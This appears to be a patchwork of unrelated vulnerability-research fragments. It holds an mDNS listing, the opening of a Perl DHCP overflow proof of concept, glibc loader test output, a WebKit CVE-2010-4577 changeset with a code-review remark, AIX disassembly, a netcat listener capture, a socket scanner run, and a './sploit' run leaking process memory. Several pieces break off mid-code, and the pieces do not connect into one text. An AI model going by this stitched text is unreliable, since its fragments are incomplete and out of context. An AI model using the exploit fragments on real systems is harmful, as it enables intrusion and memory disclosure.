+ usb0 IPv6 Invoke_AD4E4603568803A4 _bp2p._tcp local
+ usb0 IPv6 Friendly_F034C06D29A99B20_0AB96FC3A2E87129 _bp2p._tcp local
+ usb0 IPv4 Invoke_AD4E4603568803A4 _bp2p._tcp local
+ usb0 IPv4 Friendly_F034C06D29A99B20_0AB96FC3A2E87129 _bp2p._tcp local
+ usb0 IPv6 24EF7DCD11803ADA9573A4E61C4C02 _tunnel._tcp local
+ usb0 IPv4 24EF7DCD11803ADA9573A4E61C4C02 _tunnel._tcp local

#!/usr/bin/perl
# largely purloined from http://www.perlmonks.org/?node_id=1093916 as my PoC for the old options overflow proved too messy^wPerlish to rework - [machine]
use strict;
use IO::Socket;
use Net::DHCP::Packet;
use Net::DHCP::Constants;
my $serveripaddress = "10.10.10.1";

$ LD_LIBRARY_PATH=unqualified:/qualified: SLEEP=0 ../glibc-2.19/build-tree/amd64-libc/elf/ld.so ./test-dlopen-LD_LIBRARY_PATH
10030: [+] operating on non setuid binary
10030: [+] being opened via LD_LIBRARY_PATH
10030: [+] not marked insecure=unqualified/
10030: [+] not fully qualified, marking insecure=unqualified/ (via LD_LIBRARY_PATH)
10030: [+] operating on non setuid binary
10030: [+] being opened via LD_LIBRARY_PATH
10030: [+] not marked insecure=unqualified/
10030: [+] not fully qualified, marking insecure=unqualified/ (via LD_LIBRARY_PATH)
10030: [+] operating on non setuid binary

CVE-2010-4577
Red Hat - https://bugs.webkit.org/show_bug.cgi?id=49883 / http://trac.webkit.org/changeset/72685
Bug report inaccessible but changeset:
| CSSParserValueList* args = val->function->args.get(); | |
| 3632 3632 if (args && args->size() == 1) { | |
| 3633 if (equalIgnoringCase(val->function->name, "local(") && !expectComma) { | |
| 3633 if (equalIgnoringCase(val->function->name, "local(") && !expectComma && (args->current()->unit == CSSPrimitiveValue::CSS_STRING || args->current()->unit == CSSPrimitiveValue::CSS_IDENT)) { |
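Review bot: the condition added on line 3633 reads args->current()->unit without checking that args->current() is non-null. The args->size() == 1 guard on 3632 shows the list holds one value, but nothing in the visible lines shows where the list cursor is when this runs. Null-check the result of current() before reading unit, or hoist it into a local, which would also avoid calling current() twice and shorten a very long condition.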

#!/bin/sh
BINFILENAME="${1}"
tempfilename="`tempfile`"
echo "set pagination off" > "${tempfilename}"
# | grep ":$" | grep -v "\." | cut -f 2 -d "<" | cut -f 1 -d ">" | cut -f 1 -d "@"
# | grep "@plt" | cut -f 2 -d "<" | cut -f 1 -d "@"
objdump -D "${BINFILENAME}" | grep ":$" | grep -v "\." | cut -f 2 -d "<" | cut -f 1 -d ">" | cut -f 1 -d "@" | sort | uniq | while read line
do

.text:10000354 .using unk_30000BB4, %r31
.text:10000354 stw %r3, 0x110+var_28(%sp)
.text:10000358 addi %r3, %r31, 0x48C # a_dbgcmd_lquery # "_DBGCMD_LQUERYLV"
.text:1000035C bl .getenv
.text:10000360 lwz %rtoc, 0x110+saved_toc(%sp)
.text:10000364 lwz %r29, off_30001568 # dword_300015E4
.text:10000368 .using dword_300015E4, %r29
.text:10000368 cmpwi %r3, 0
.text:1000036C bne loc_100006D0

FreeBSD 9.2-RC1:
$ nc -n -vv -l -p 9090 | hexdump -C
listening on [any] 9090 ...
connect to [192.168.x.y] from (UNKNOWN) [192.168.124.194] 52680
00000000 68 65 6c 6c 6f 0a 00 00 00 00 00 00 00 00 00 00 |hello...........|
sent 0, rcvd 30
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |..............|
0000001e

$ sudo getcap `which ping`
sudo getcap `which ping`
[sudo] password for xx:
/bin/ping = cap_net_raw+ep

$ find / -type s | ./UNIXSocketScanner.pl -x 5 -p ./probes -n /usr/share/nmap/nmap-service-probes
...
/tmp/akonadi-xxx.HoHuFd/mysql.socket
+ matches nmap-response-mysql
+ matches nmap-probe-NULL
/tmp/akonadi-xxx.HoHuFd/akonadiserver.socket
/tmp/ksocket-xxx/klauncherMT5682.slave-socket
/tmp/ksocket-xxx/kio_http_cache_cleaner
/tmp/ksocket-xxx/kdeinit4__0
/tmp/.ICE-unix/5725

$ ./sploit 2000 $$
maximumleak: 2000
target: 14876824
... ...........n .......bash.......4.....Sq...NQ...@..../usr/lib/libiconv.a.shr4.o.....4.....R........> ..../usr/lib/libi18n.a.shr.o.......0.....R....-u.RQ(..#4/usr/lib/nls/loc/en_US.....4.....Q.....>..f....(/usr/lib/libcrypt.a.shr.o......0.....f.......5p...../usr/lib/libdl.a.shr.o.....8...........P.e.0..HV/usr/lib/libcurses.a.shr42.o.utd...<.....M.......)....?./usr/lib/libpthreads.a.shr_xpg5.o......<.....Q....1_.$....! /usr/lib/libpthreads.a.shr_comm.o.ip.............=...x....eh/usr/lib/threads/libc.a.shr.o...rc.teboot.d........2.......S.(..rc.trustedboot.............3.......r. ..rc.wpars...........4......... ..resolv.conf........5......... ..route.....[`.......6.......-....rpc........7......... ..rpc.pcnfsd.c.......8.......D....rpm........9......... ..rsvpd.conf.........:......... ..screenrc...........;.......P. ..securetcpip........<......... ..security...........=.......v. ..sendmail.cf........>......... ..services...........?........